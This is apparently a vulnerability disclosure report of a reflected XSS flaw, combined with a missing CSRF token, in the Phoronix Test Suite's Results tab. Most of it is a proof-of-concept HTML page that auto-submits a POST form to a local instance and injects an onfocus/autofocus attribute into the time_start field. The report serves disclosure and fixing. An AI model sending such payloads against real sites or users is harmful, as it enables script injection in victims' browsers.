Description

Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.

Proof of Concept

Install a local instance of phoronix
create a Search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022-02-08"onfocus="confirm(origin)"autofocus="" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send to victim. Victim click on the link resulting reflected cross site scripting.

Impact

This vulnerability is capable of Reflected XSS